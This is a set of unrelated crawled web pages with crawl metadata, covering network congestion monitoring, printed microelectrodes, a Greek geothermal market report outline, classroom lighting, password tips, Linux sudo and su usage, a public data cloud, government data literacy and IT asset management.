Fixing network congestion is not rocket science. Once the root cause is identified, you can reduce your network's inefficiency. Here are some network congestion solutions that will keep your network optimized.
→ Monitoring your network traffic regularly can help you gain insights on how every device and interface in your network is performing. With a network congestion management tool, such as ManageEngine NetFlow Analyzer, you can monitor network congestion, drill down to application level traffic and view traffic patterns. You can see the bandwidth utilization and the underlying troubles.
→ Prioritizing network traffic significantly lowers the risks of experiencing slow internet speeds. As a network admin, when you use a network congestion analysis tool like NetFlow Analyzer, you will know which applications consume most network bandwidth as opposed to prioritized applications traffic in real time.
By applying QoS policies to your network, you can classify business-critical real time applications, and make sure that those applications receive maximum bandwidth. This way, you are assured that critical apps receive enough bandwidth, and your network downtime is lowered significantly.
→ Improving bandwidth can play an important role in the way your network handles data. A wider bandwidth can help smooth the transfer of data. Additionally, increasing bandwidth might help the network handle many routers simultaneously. Ultimately, there will only be fewer interruptions, and a faster connection.
ManageEngine's NetFlow Analyzer is a holistic network congestion monitoring tool that gives you real-time insights into your network traffic's performance. Using this network congestion test solution, you can reduce congestion in network or manage any network traffic-related challenges proactively with comprehensive monitoring of all applications and protocols of your network.
Network congestion is an occurrence when the network is overloaded with data beyond its capacity.
There are many reasons to what can make a network congested. Some common causes are: connectivity of too many devices in a network, outdated hardware devices, or faulty device etc.
Since in most cases the network congestion originated from packet loss or delay, you can carry out the network congestion test with Ping, or bandwidth monitoring. With Ping test, you will learn about packet loss, and Round-Trip-Time (RTT). Bandwidth monitoring on the other hand, will tell you which host or server is consuming the most bandwidth.
Each problem would require a different solution. Some most common practices you could follow to avoid network congestion are to implement a QoS policy, replace faulty or old devices or attending to security attacks as soon as discovered.
|
<urn:uuid:c368485b-d1a2-4cef-9175-a035511be180>
|
CC-MAIN-2022-40
|
https://www.manageengine.com/products/netflow/network-congestion.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00658.warc.gz
|
en
| 0.931806 | 1,174 | 3.15625 | 3 |
Microelectrodes can be used for direct measurement of electrical signals in the brain or heart.
These applications require soft materials, however.
With existing methods, attaching electrodes to such materials poses significant challenges.
A team at the Technical University of Munich (TUM) has now succeeded in printing electrodes directly onto several soft substrates.
Researchers from TUM and Forschungszentrum Jülich have successfully teamed up to perform inkjet printing onto a gummy bear.
This might initially sound like scientists at play — but it may in fact point the way forward to major changes in medical diagnostics.
For one thing, it was not an image or logo that Prof. Bernhard Wolfrum’s team deposited on the chewy candy, but rather a microelectrode array.
These components, comprised of a large number of electrodes, can detect voltage changes resulting from activity in neurons or muscle cells, for example.
Second, gummy bears have a property that is important when using microelectrode arrays in living cells: they are soft.
Microelectrode arrays have been around for a long time.
In their original form, they consist of hard materials such as silicon.
This results in several disadvantages when they come into contact with living cells.
In the laboratory, their hardness affects the shape and organization of the cells, for example.
And inside the body, the hard materials can trigger inflammation or the loss of organ functionalities.
Rapid prototyping with inkjet printers
When electrode arrays are placed on soft materials, these problems are avoided.
This has sparked intensive research into these solutions.
Until now, most initiatives have used traditional methods, which are time-consuming and require access to expensive specialized laboratories.
“If you instead print the electrodes, you can produce a prototype relatively quickly and cheaply.
The same applies if you need to rework it,” says Bernhard Wolfrum, Professor of Neuroelectronics at TUM.
“Rapid prototyping of this kind enables us to work in entirely new ways.”
Wolfrum and his team work with a high-tech version of an inkjet printer.
The electrodes themselves are printed with carbon-based ink.
To prevent the sensors from picking up stray signals, a neutral protective layer is then added to the carbon paths.
Materials for various applications
The researchers tested the process on various substrates, including PDMS (polydimethylsiloxane) — a soft form of silicon — agarose — a substance commonly used in biology experiments — and finally various forms of gelatin, including a gummy bear that was first melted and then allowed to harden.
Each of these materials has properties suitable for certain applications.
For example, gelatin-coated implants can reduce unwanted reactions in living tissue.
Through experiments with cell cultures, the team was able to confirm that the sensors provide reliable measurements.
With an average width of 30 micrometers, they also permit measurements on a single cell or just a few cells.
This is difficult to achieve with established printing methods.
“The difficulty is in fine-tuning all of the components — both the technical set-up of the printer and the composition of the ink,” says Nouran Adly, the first author of the study.
“In the case of PDMS, for example, we had to use a pre-treatment we developed just to get the ink to adhere to the surface.”
Wide range of potential applications
Printed microelectrode arrays on soft materials could be used in many different areas.
They are suitable not only for rapid prototyping in research, but could also change the way patients are treated.
“In the future, similar soft structures could be used to monitor nerve or heart functions in the body, for example, or even serve as a pacemaker,” says Prof. Wolfrum.
At present he is working with his team to print more complex three-dimensional microelectrode arrays.
They are also studying printable sensors that react selectively to chemical substances, and not only to voltage fluctuations.
- Nouran Adly, Sabrina Weidlich, Silke Seyock, Fabian Brings, Alexey Yakushenko, Andreas Offenhäusser, Bernhard Wolfrum. Printed microelectrode arrays on soft materials: from PDMS to hydrogels. npj Flexible Electronics, 2018; 2 (1) DOI: 10.1038/s41528-018-0027-z
|
<urn:uuid:ba3d851b-ade2-4b77-8033-77990f5e2699>
|
CC-MAIN-2022-40
|
https://debuglies.com/2018/06/24/printing-microelectrode-arrays-on-gelatin-and-other-soft-materials-could-pave-the-way-for-new-medical-diagnostics-tools/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00058.warc.gz
|
en
| 0.919616 | 955 | 3.328125 | 3 |
The market, which is estimated to be USD XX billion in 2016, is expected to grow to USD XX billion by 2021, at a CAGR of XX percent.
Geothermal energy is considered to be one of the cleanest energies in the world. The government has shifted its focus towards diversifying its matrix of power generation sources, looking at other renewable resources such as solar energy, geothermal energy, etc.
The energy production from this technology depends on the availability of the geothermal energy sources. With the amount of heat generated, the geothermal energy can be used for power generation, thermal springs or in other ways. Various places have been identified as potential geothermal energy resources, but, only a small fraction of them are being exploited currently. Greece government has identified the potential of this low temperature geothermal energy and has classified them according to the usage, such as bathing, recreation and tourism, industrial use, space heating, therapeutic, and drinking. The localities with these thermal springs have become new tourist attractions and have given a boost to the local economy, by emphasizing on thermal spas, centers for entertainment and physical conditioning for revitalizing the body, etc.
With increase in the demand for energy, extra efforts are required for new developments in the Greece , as the current availability of energy is not catering to the increase in power demand. This increase in demand combined with government regulations, have created favorable conditions for public and private partnerships. At the moment the geothermal resources at these places are used for BRT (Bathing, Recreation and Tourism) and TDB (Therapeutic, Drinking and Bathing), in spite of their PIS (Potential for Industrial use and Space heating) usages, etc. Greece government is planning to utilize the geothermal energy resources for industrial use, which will indirectly help in reaching the energy goals.
1. Executive Summary
2. Research Methodology
3. Market Overview
3.2 Installed Capacity and Forecast, until 2023 (in MW)
3.3 Market Size and Demand Forecast, until 2023 (in USD billion)
3.4 Recent Trends and Developments
3.5 Government Policies and Regulations
4. Markets Dynamics
5. PESTLE Analysis
6. Industry Attractiveness - Porter’s Five Force Analysis
6.1 Bargaining Power of Suppliers
6.2 Bargaining Power of Consumers
6.3 Threat of New Entrants
6.4 Threat of Substitutes
6.5 Intensity of Competitive Rivalry
7. Greece Geothermal Power Market Analysis, by Technology
7.1 Direct Dry Steam Plants
7.2 Flash Steam Plants
7.3 Binary Power Plants
8. Key Company Analysis (Overview, Business Segmentation, Financial Analysis**, Recent Development and Analyst View)
8.1 EPC Contractors & Equipment Suppliers
8.2 Project Operators & Developers
9. Competitive Landscape
9.1 Mergers & Acquisitions
9.2 Joint Ventures, Collaborations and Agreements
9.3 Strategies Adopted by Leading Players
10.1 Contact Us
(**Subject to availability on public domain)
|
<urn:uuid:8c7e225f-865c-470c-8b40-01dcf887ac50>
|
CC-MAIN-2022-40
|
https://www.mordorintelligence.com/industry-reports/greece-geothermal-energy-market
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00058.warc.gz
|
en
| 0.897605 | 682 | 2.71875 | 3 |
Classroom lighting can be an overlooked factor for children’s success in school. However, studies have shown that lighting quality affects students’ abilities to see clearly, concentrate and perform well in the classroom. Since lighting plays a critical role in our everyday lives, it’s worth our while to understand the quality of light that’s shining down on our children.
In the first part of our series we’ll explain how replacing traditional classroom lighting with full-spectrum lighting helps students’ performance in the classroom.
Classroom Lighting and Visual Acuity
Could it be possible that different classroom lighting, or the use of fluorescent classroom light filters, could improve children’s abilities to see clearly?
Visual acuity (VA) commonly refers to the clarity of vision. Visual Acuity is dependent on optical and neural factors, i.e. (i) the sharpness of the terinal focus within the eye, (ii) the helath and functioning of the retina, and (iii) the sensitivity of the interpretative faculty of the brain.
A 2006 study by Berman et al. on lighting and visual acuity suggests this is exactly the case. The study compared the use of standard color temperature fluorescent lighting with the use of high color temperature fluorescent lighting on children’s visual acuity in the classroom.
Let’s quickly define visual acuity: Visual acuity is the clarity or sharpness of vision. The graphic below shows the Snellen chart, a common method for measuring a person’s visual acuity.
Classroom Lighting Study Results
The results from the study were quite enlightening, if you’ll pardon the pun.
The study showed that high color temperature fluorescent lighting helps students see clearer and allows them to read faster. It also reduces the visual fatigue and glare that are typically experienced with standard color temperature fluorescent lighting.
Classroom lighting used in the study included standard 3600K correlated color temperature (CCT) lights and 5500K CCT fluorescent fixtures.
To better explain what this means, we’ve provided a breakdown of correlated color temperatures:
- 2000K CCT is equal to sunlight at sunrise or sunset under clear skies
- 3500K CCT is the equivalent to direct sunlight an hour after sunrise
- 4300K CCT is like morning or afternoon direct sunlight
- 5400K CCT is akin to noon summer sunlight
In short, high-quality classroom lighting improves students’ visual acuity, giving them the sight they need to perform well in school.
Pupil Size Matters
What does a smaller pupil diameter mean? When the pupil is smaller, the depth of the vision field increases and visual acuity improves. This, in turn, results in a reduction in visual fatigue, faster reading times and less visual glare. Essentially, the eye is seeing at its most optimal level.
Whether you are using high color temperature classroom lighting bulbs or classroom light filters to increase the color temperature, you will find your students benefit from improved visual acuity and often perform better in the classroom. By adding more blue/green into the color spectrum, you are essentially creating full spectrum light.
The study also notes a strong correlation between pupil size and reading performance, where light spectrum, not brightness is the driving factor. In a follow-up blog, we will examine exactly how replacing lighting in classrooms with full spectrum lighting has proven to increase reading and math test scores.
Erik Hinds is Vice President of Helping People at Make Great Light. For more information on how fluorescent light filters for classrooms can improve the learning environment, please visit the resource center.
|
<urn:uuid:9bddb679-433c-43e5-8c8d-f10c8e5fe852>
|
CC-MAIN-2022-40
|
https://mytechdecisions.com/facility/how-does-classroom-lighting-affect-the-students-part-i/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00058.warc.gz
|
en
| 0.909048 | 750 | 3.671875 | 4 |
Passwords today are a real threat to security. Most hacking-related breaches are due to weak or stolen passwords, a recent report shows over 80%. If you want to safeguard your personal info and assets, creating secure passwords is a big first step. Impossible-to-crack passwords are complex with multiple types of characters (numbers, letters, and symbols). Making your passwords different for each website or application also helps defend against hacking.
That’s why we recommend LastPass Password Generator. LastPass runs locally on your Windows, Mac or Linux computer, as well as your iOS or Android device. The passwords you generate are never sent across the web.
Here are some common sense Password Tips
- Always use a unique password for each account you create. The danger with reusing passwords is that as soon as one site has a security issue, it‘s very easy for hackers to try the same username and password combination on other websites.
- Don’t use personally identifiable information in your passwords. Names, birthdays, and street addresses may be easy to remember but they’re also easily found online and should always be avoided when creating new passwords to ensure the greatest strength.
- Create passwords with at minimum of 12 characters and containing letters, numbers, and special characters. Some humans prefer passwords which are 14 or more characters in length.
- If you’re creating a master password that you’ll need to remember, try using phrases or lyrics from your favorite movie or song. Just add random characters, but don't replace them in easy to guess patterns.
- Use a password manager like LastPass to create and manage your passwords. It'll keep your information protected from attacks or snooping.
- Avoid weak, commonly used passwords like asd123, password1, or Temp!. Some examples of a strong password include: G&294E3w(LN1*, KIYs^r@az)97$x, 9iw%v33gTwo)9k*g.
- Avoid using personal information for your security questions. Use LastPass to generate another password and store it as the answer to these questions. The reason? Some information, like the name of the street you grew up on or your mother’s maiden name, is easily found by hackers and can be used in a brute-force attack to gain access to your accounts.
- Avoid using similar passwords that change only a single word or character. This practice weakens your account security across multiple sites.
- Change your passwords when you have reason to, after you've shared them with someone, after a website has had a breach, or when it's been over a year since you last rotated it.
- Never share your passwords via email or text message. The secure way to share is with a tool like LastPass that gives you the ability to share a hidden password and even revoke access when necessary.
|
<urn:uuid:f4517a32-bb4e-4a75-a370-8b094687f7bc>
|
CC-MAIN-2022-40
|
https://www.alpineweb.com/backroom/knowledgebase/20/Creating-a-Secure-Password.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00058.warc.gz
|
en
| 0.919835 | 601 | 2.84375 | 3 |
Public cloud provider CloudSigma has a vision for a cloud-based “data discovery” model that will take Big Data generated around the world and beyond (yes, in space) and put it in the hands of users. The company is building ecosystems out of publicly available data, storing it and making it accessible for users to build services around. “Data has gravity, and that naturally draws computing into the cloud,” said Robert Jenkins, CEO, CloudSigma.
There are lots of data in the public domain, but the barriers to access and leverage it is high. The Zurich-based company is trying to address this problem of “elitism,” making the data available on-demand in its Big Data cloud so users can easily access and temporarily mount it on virtual machines to build services. There is a wealth of possibilities across industries and across disciplines.
“Even though it’s accessible, most people can’t use it,” Jenkins said. “What we're doing is storing this data for free and making money on the compute end of things, as users access it on an as-needed basis to build better systems and offerings.”
Inspired by European science cloud
The work was born out of the Helix Nebula Marketplace, launched to provide European scientists easy access to commercial cloud services. CloudSigma is one of the companies represented on the marketplace. Helix Nebula is a public-private collaboration launched to support massive IT and data requirements of European research organizations, including European Molecular Biology Laboratory, European Space Agency and European Organization for Nuclear Research (CERN), best known for its Large Hadron Collider.
The vision is a cloud-based discovery model. “Making public data extensible is a big movement, and there’s been huge progress,” said Jenkins. “It’s becoming yesterday’s problem. The problem now is the coordination problem. The challenge with Big Data is you can’t move it around. Cloud is in a unique position to solve this problem.”
“Say I’m a user that has an idea for a better climate model or trading algorithm, but the bar is too high to set up the proper resources,” he said. “We’ve been working on putting the data in public cloud so it’s much more useful. We dedupe the data, replace ownership with access. All you need is short access, next to on-demand, ad-hoc computing. We’re happy because you’re doing the computing, and we can give public institutions the free storage.”
From ash-cloud data to MRI scans
CloudSigma is already working with a number of institutions and has several agreements in place with organizations like the European Space Institute and an Iceland organization that maps ash cloud and volcanic activity.
It’s working with institutions that do neurological research as well. “We’re building a cloud backend for MRI scanners that sends it up to the cloud, renders and creates a much higher quality image,” said Jenkins. “They get a better quality service and it takes the computing out of the operating room.” Most general MRIs aren’t done in the highest resolution because of cost, but with cloud it has the processing power on-demand to produce better images, which helps with Alzheimer's research, as an example.
Many choose to donate their scans to science, and the company is aggregating publicly available scans from hundreds of hospitals in Europe and all over the world. It will allow neurological research to see time series of brain scans for research.
Jenkins also spoke of a satellite launched in Europe for world observation. It has magnetic field sensors, can track ground water movement and the movement of the Earth with down-penetrating radar. The satellite generates a terabyte of data a day, and Jenkins wants to put this data in people's hands as well.
More closed financial data product in the making
The possibilities are endless as there’s an increasing movement to make more publicly available data useful for the public.
CloudSigma’s data ecosystems also go beyond public data. Going forward, the company is also looking to provide a similar ecosystem for financial data “We’re looking into the financial services industry and seeing how we can expose it securely to service providers,” said Jenkins. This kind of data is of course more proprietary and sensitive, so the company is building a secure service for it.
|
<urn:uuid:3674e57e-91fb-474f-94bd-757d0bf5619d>
|
CC-MAIN-2022-40
|
https://www.datacenterknowledge.com/archives/2014/07/11/cloudsigmas-big-data-cloud-opens-public-domain-data-access/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00058.warc.gz
|
en
| 0.937506 | 935 | 2.515625 | 3 |
How to Escalate Permissions on Linux with Sudo and Su
There comes a time in every administrator's life where you need to escalate privileges in Linux. Windows can be a lot more forgiving when you need to perform an administrative task. The Windows UAC prompt makes escalating privileges easy.
So much so that a lot of entry-level IT professionals don't even realize that just because they have an admin account doesn't mean that they still don't need to escalate user permissions to perform administrative tasks in Windows.
Linux isn't that nice, though. In Linux, escalating privileges is a very deliberate act. Let's discuss how you escalate privileges in Linux and why you would want to.
Why Escalate Privileges in Linux?
There are a lot of parts to a computer system that can be dangerous to work with. Editing those components can cause issues like preventing a computer from starting properly, disabling services, damaging hardware, or causing security issues. So, OSes like Linux and Windows require escalated privileges before those components can be changed.
Modern operating systems give systems administrators a way to secure the OS through a means of user accounts and privilege levels. This lets normal users access and use a computer to get a job done without being able to break that computer. Meanwhile, system administrators are still capable of performing the complex system administration tasks required to keep computer systems up and running.
It is assumed by these OSes that if a person can escalate privileges in an OS then they must be an administrator and they know what they are doing. The responsibility of security and maintenance is then passed from the OS itself to the system administrator.
Locking certain tasks behind user privileges is also a security measure, too. By requiring input from a user to escalate privileges, the OS can prevent malware from making changes on that system. This can prevent malware from doing things like automatically installing software on a computer.
How to Escalate Privileges in Linux
Standard user accounts in Linux cannot perform administrative tasks, at least not by default. Linux doesn't have the concept of an administrative account like Windows. Let's rewind there for a moment. All operating systems have admin profiles. Sort of.
Operating systems have user profile permissions or capabilities. These profiles and permissions designate what kinds of tasks can be performed in an operating system. Windows, by default, has three user account profile types:
Those three types of account profiles are nothing more than profiles with common permissions pre-configured for them. Those permission levels can be changed per profile or account.
This concept confuses a lot of newer IT administrators and help desk techs. It's common for someone to think that just because they have admin access in Windows that they can do everything on a computer. This can't be further from the truth, though.
In an enterprise environment, it's common for there to be admin profiles and super-admin profiles. Very few administrators in an organization will have super-admin privileges with permissions to adjust everything on a computer while techs will have a normal admin profile.
Linux does have a concept of user groups, but these perform slightly different functions in Linux. A default Linux install will have standard user profiles, a root profile (the system administrator), and various system users and groups depending on what applications are installed.
Though a standard user profile in Linux can be adjusted to have various permission levels, it's common practice to escalate privileges into the root profile to perform administrative tasks. Users would either use the SU command, the SUDO command or log into the Linux OS with the root account itself depending on which version of Linux is being used.
For example, Red Hat Linux will use the SU command. Debian or Ubuntu OSes will use the SUDO command.
Pro Tip: Though Ubuntu and Debian don't use the SU command because the root password is hidden for security reasons, you can change and set a password for the root profile to use the SU command in these versions of Linux. Simply use the 'sudo passwd root' command in the Linux terminal to set a new password for the root profile. This will also enable the ability to log in with the root profile directly. Proceed with caution, though. This can be a security risk.
An Overview of How to Escalate Permissions on Linux with Sudo, Su [VIDEO]
In this video, Shawn Powers covers how to effectively manage privileges. Specifically, you'll learn about three different Linux commands that allow you to escalate your privileges from a lower-level account to one with more permissions, up to (and including) super user rights. He'll show you which to use, how, and when to do so.
What is the SU Command in Linux?
SU stands for 'substitute user'. It's a way of escalating privileges in Linux. The SU command changes the input from your Linux profile to the root profile within the Linux terminal. This allows you to perform tasks in Linux typically limited to the root account.
Escalating privileges to the root account is easy. In the Terminal, enter the command 'su'. You will be prompted for the Root account's password. Keep in mind the password you need to enter is for the root account and not your account.
After escalating to the Root account, notice that the terminal prompt changed from your username to the Root account's name. If you are using this Linux computer locally (as opposed to connecting to it remotely), you should see something like 'root@localhost' instead of 'yourName@localhost'.
Once you use the SU command and switch to the Root account, you do not need to keep using the SU command. Every command you enter in the terminal at this point will be entered as the Root profile. Be wary of this. For example, if you enter the command to store Git credentials globally while impersonating the Root profile, those Git credentials will only work while using that Root account. Those credentials will not be accessible while using your normal Linux profile.
To stop using the Root profile, type 'exit' in the terminal.
What is the SUDO Command in Linux?
The SUDO command stands for 'substitute user do' as in 'do something as another user'. The SUDO command works similarly to the SU command in Linux but with a couple of exceptions. For instance, when you use the SUDO command, you will use the password for your Linux profile instead of the password for the Root account.
Likewise, you must use the SUDO command to escalate privileges for each command individually. Using the SUDO command does not cause you to impersonate the Root account in Linux permanently as the SU command does.
Pro Tip: You can use the SUDO command to fully impersonate the Root account by using 'sudo su' in the terminal. This would be like using the SU command by itself.
Only certain accounts in Linux can use the SUDO command. By default, the account created when Linux is installed is always configured to use the SUDO command. That is because user accounts are typically part of the Wheel user group in Linux, and the Wheel user group has permission to use the SUDO command.
The configuration file controlling the SUDO command is typically stored in /etc/sudoers. This could change depending on the version of Linux you are using, so if you cannot find the 'sudoers' file, consult the documentation for the distribution of Linux you are using for that file's location.
To edit the 'sudoers' file, you wouldn't make any changes to it directly, though. You should use an application called VISUDO for that.
What is the VISUDO Command in Linux?
VISUDO is a command to edit the configuration file for the SUDO command. Using this command will edit the 'sudoers configuration file in the '/etc' folder in Linux. Using the VISUDO command will also open the 'sudoers' file within a wrapper. This will help prevent any mistakes from being saved to that file by accident.
The 'sudoers' file has a lot of great examples inside of it for each configuration option.
Typically, when you change who can use the SUDO command, you would update the user group that can use that command and not individual users themselves. In the configuration file, there is an option that starts with '%wheel'. This is the 'wheel' group. User accounts are part of this group by default.
The percentage sign tells the configuration file that 'wheel' is a user group. You can add, modify, or change user groups by replicating the configuration option below replacing 'wheel' with the name of the user group you would prefer to use:
wheel ALL=(ALL) ALL
Below that option is an option to allow user groups to use the SUDO command without entering a password. That entry looks like this:
Same thing without a password
wheel ALL=(ALL) NOPASSWD:ALL
To enable the ability to use the SUDO command without a password, uncomment that line above (remove the # from the beginning of it) and save the 'sudoers' file. Enabling that configuration will let you run scripts without being required to enter a password. That means scripts can run unattended.
Pro Tip: Instead of making all commands accessible with the SUDO command without a password by uncommenting the line above, you can add only specific commands by replacing NOPASSWD: ALL with 'NOPASSWD:enter your command here' instead (EG. NOPASSWD:ls).
We covered a lot of information in this article for something as simple as escalating user privileges in Linux. Just in case you need a recap, here you go.
You need to escalate privileges in Linux before executing any restricted commands. Depending on the version of Linux you are using, you will either use the SU or SUDO commands. Red Hat and Fedora use SU while Debian-based versions of Linux use SUDO.
The SU command lets you impersonate the Root profile in the Linux terminal until you exit out of that profile. The SUDO command lets you impersonate the Root profile but only for a single command. You need to keep using SUDO for each subsequent command. Use the VISUDO tool to edit the 'sudoers' configuration file for the SUDO command.
|
<urn:uuid:88bb097d-c905-4a3f-955b-4916b95bcdad>
|
CC-MAIN-2022-40
|
https://www.cbtnuggets.com/blog/certifications/open-source/how-to-escalate-permissions-on-linux-with-sudo-and-su
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00258.warc.gz
|
en
| 0.900946 | 2,148 | 2.765625 | 3 |
A central location for storing various types of data a business needs. A data lake is different from a data warehouse in the sense that data can remain in its raw form, without being transformed. This allows developers to essentially build a “schema on read” which basically means as data gets processed, the application can determine how to use and store that data. This makes big data analysis easier because less work is required to cleanse and organize the data in the data lake. AWS, Azure and Google Cloud offer data lake solutions in the form of their blob storage, like S3 in the case of AWS. All data in a data lake can be stored in an S3 bucket and then applications can read from that bucket and determine how to process it. Data Lake technologies like Glue can crawl buckets and determine what type of data is in them, making querying for that data much simpler.
in other words
The Library Archives - All your data in it's oldest, purest form waiting for you to find it.
|
<urn:uuid:78725a78-6500-4b20-8627-14641ef610dd>
|
CC-MAIN-2022-40
|
https://www.intricately.com/glossary/data-lake
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00258.warc.gz
|
en
| 0.934505 | 210 | 2.671875 | 3 |
The world of data analytics is changing faster than ever. And government employees have to keep up or get left in the dust. By 2024, 60% of government data analytics and artificial intelligence (AI) projects are predicted to directly impact real-time operational decisions and outcomes. As public servants, you need to increase your literacy of the larger data ecosystem to do your jobs efficiently and effectively. This guide will help you learn four key competencies inspired by that lifecycle so you can enhance everyday collaboration and bring continuous improvement to your team and agency. The four key competencies are data visualization, data storytelling, automation and innovation. With the help of experts who do this work every day, here are best practices to help you better use and share data at work. According to the Federal Data Strategy 2021 Action Plan, “By the end of 2022, agencies should have a solid foundation throughout their workforce, including a minimum level of data literacy among all staff and a sufficient accumulation of data skills to allow for effective performance of all aspects of the data lifecycle.” Download the guide to learn how to reach these goals with the four key competencies.
Data Literacy for Government Transparency
“Technology has changed so much, but our skill sets haven’t kept pace. People and organizations that previously didn’t use data all that much suddenly have to start using it at a more advanced level. That’s why it’s imperative to establish a data literacy program at your agency. First, it needs to be agile. Data training cannot be a one-and-done deal. Second, have accessible assessments. Are you developing sustainable programs that meet people at the skill levels they’re at? And are you assessing the actual skills of your target audience, or the employees who are impacted by data? Third, co-design, or design solutions with users and stakeholders from the start. People can resist change especially when they are not involved in it. When you build data solutions or programs, you need the perspectives of users to inform the journey, particularly when they’re non-data experts.”
Read more insights from Tableau’s Senior Manager of Customer Success, State and Local Government, Nongovernmental Organizations (NGOs) and Higher Ed, Sarah Nell-Rodriquez.
What Story Is Your Data Telling?
“Let’s say defense analysts are trying to connect the dots around terrorist activity. Using various data points such as bank account numbers, location coordinates, equipment types and names, analysts can derive a cohesive “story” from the data that aids the mission. To do this, traditionally, analysts combed through data from various sources — spreadsheets, databases, cloud storage, etc. — to manually input into an Excel file and then make connections between the fields. ‘To get to a story or result on one particular mission-critical use case, it was taking six to nine months of two full-time employees just combing through this data,’ said MarkLogic’s Eric Putnam, who has worked in the U.S. defense community. In other words, this manual integration was taking too much time and too much effort.”
Read more insights from MarkLogic’s Senior Account Executive for National Security Programs, Eric Putnam.
How AI Opens Up Other Types of Data
“Imagine you have a massive cache of digital family photos, and you’re looking for images of your child’s kindergarten graduation. Sure, it’s great having all those photos on the computer, but unless you tagged them in some way, there’s no quick way to find what you need. This dilemma mirrors how valuable information can be so difficult to find when it comes in the form of ‘unstructured data.’ Unstructured data includes images, video, audio and other types of information that cannot be stored in traditional databases or analyzed with traditional data tools. Structured data appears in rows and columns that are clearly labeled, making it easy to sort and analyze. Unfortunately, that’s not the case with unstructured data.”
Read more insights from Micro Focus Government Solutions’ Senior Solution Architect for AI/ML/Data Privacy/Data Governance, Patrick Johnson.
Finding the Solution in Unexpected Places
“Democratized analytics is the technological capability that enables data workers of various technical skill levels to leverage data and share its insights with other employees of various skill levels. Put simply, it’s analytics accessible for and inclusive to all. Unified analytics is technology that allows data workers to perform the entire analytic life cycle in one place. From data prep and blend, which identifies and combines data for descriptive, predictive and prescriptive analytics, to machine learning, an advanced form of AI that gets smarter over time — unified analytics allows a range of data transformation processes to be done in a single location, no matter the data source or type. No-code/low-code analytics is analytics that does not require coding skills to prep, clean, analyze and share data. And we’re not talking spreadsheets here.”
Read more insights from Alteryx’s Director of Solutions Marketing for the Public Sector, Andy MacIsaac.
Let’s Get Back to Basics for Collaboration
“Everyday work is more than what happens at the task level. You may think updating spreadsheets and responding to emails are low-value chores, but these and countless other tactical to-dos impact how the larger mission is carried out. How task-level activities get done reflect the health and success of strategic-level goals and initiatives. However, some federal agencies are missing out on the efficiencies and insights that can be captured at the tactical level. A survey commissioned by Smartsheet, a cloud-based work management platform provider, found that 76% of government officials estimate that using collaborative work management software could increase their organization’s efficiency. However, nearly one in three federal workers today are prevented from achieving success because their teams are siloed. Federal workers need visibility and access to information if they’re expected to collaborate with others and make informed decisions.”
Read more insights from Harvard Kennedy School’s Senior Advisor for Insight Partners and Senior Fellow, Nick Sinai.
Download the full GovLoop Guide for more insights from these data literacy thought leaders and additional government interviews, historical perspectives and industry research on the future of data.
|
<urn:uuid:75ead9e3-004f-422a-aa61-f0f5ec53eded>
|
CC-MAIN-2022-40
|
https://www.carahsoft.com/community/iig-govloop-aug-data-2022
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00258.warc.gz
|
en
| 0.922385 | 1,333 | 2.5625 | 3 |
IT Asset Management (ITAM) traditionally included assets such as servers, mainframes, routers, switches, firewalls, desktop and laptop computers, printers, and software — all things managed by IT. But technology no longer only consists of IT assets. Today, there are non-IT technology assets in organizations everywhere.
With the rise of the Internet of Things (IoT), technology is pervasive in things such as heating, ventilation, and air conditioning (HVAC) systems, devices and sensors, security cameras, medical devices, and more — all connected to the Internet and owned by different areas of the business. Thus, ITAM has evolved into Technology Asset Management (TAM).
Is ITAM – TAM more than a software asset management tool?
TAM is more than an inventory of an organization’s assets. Its importance to the organization is reinforced by the existence of various international and U.S. standards, including the following:
- International Organization for Standardization (ISO) and International Electrotechnical Commission (IEC):ITAM is defined in ISO/IEC 19770 specifically addresses modern challenges such as security (aligned to ISO/IEC 27001), cloud services, and mobile computing including:
- Physical and digital media
- Physical and virtual IT equipment
- Licenses (including proof of license)
- ITAM system management assets (including systems, tools, and metadata)
- U.S. National Institute of Standards and Technology (NIST): NIST Special Publication 1800-5 defines a standard ITAM approach and architecture and recognizes that “ITAM is foundational to an effective cybersecurity strategy” because it “enhances visibility for security analysts, which leads to better asset utilization and security.” The NIST Framework for Improving Critical Infrastructure Cybersecurity is organized into the following five core functions:
Within the Identify function, the Asset Management category is defined as follows: “The data, personnel, devices, systems, and facilities that enable the organization to achieve business purposes are identified and managed consistent with their relative importance to organizational objectives and the organization’s risk strategy.”
Who uses ITAM?
TAM provides tangible benefits for many different use cases across organizations, including the following:
- Finance and Procurement: TAM helps finance, procurement, and asset managers with negotiating purchases and renewals, reconciling fixed asset reports, eliminating wasted expenditures, and validating the disposition of retired assets.
- Security and Compliance: TAM identifies all things attached to the organization’s network, providing detailed information about location, configuration, accessibility monitoring for unplanned changes, unauthorized access, vulnerable software, and lost and unresponsive assets, as well as workflow audit tracking for GDPR, HIPAA, SOX, PCI DSS, and more.
- IT Operations: TAM delivers a self-aware IT infrastructure by updating CMDBs, DCIM, and building management systems (BMSs) with current asset configuration and location information, improving efficiency and SLAs for change management workflows and service desk management.
|
<urn:uuid:5a0d4b63-fa11-4c87-8884-4f5fc5d9d3d2>
|
CC-MAIN-2022-40
|
https://www.nlyte.com/faqs/what-is-it-asset-management/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00258.warc.gz
|
en
| 0.913823 | 652 | 2.515625 | 3 |
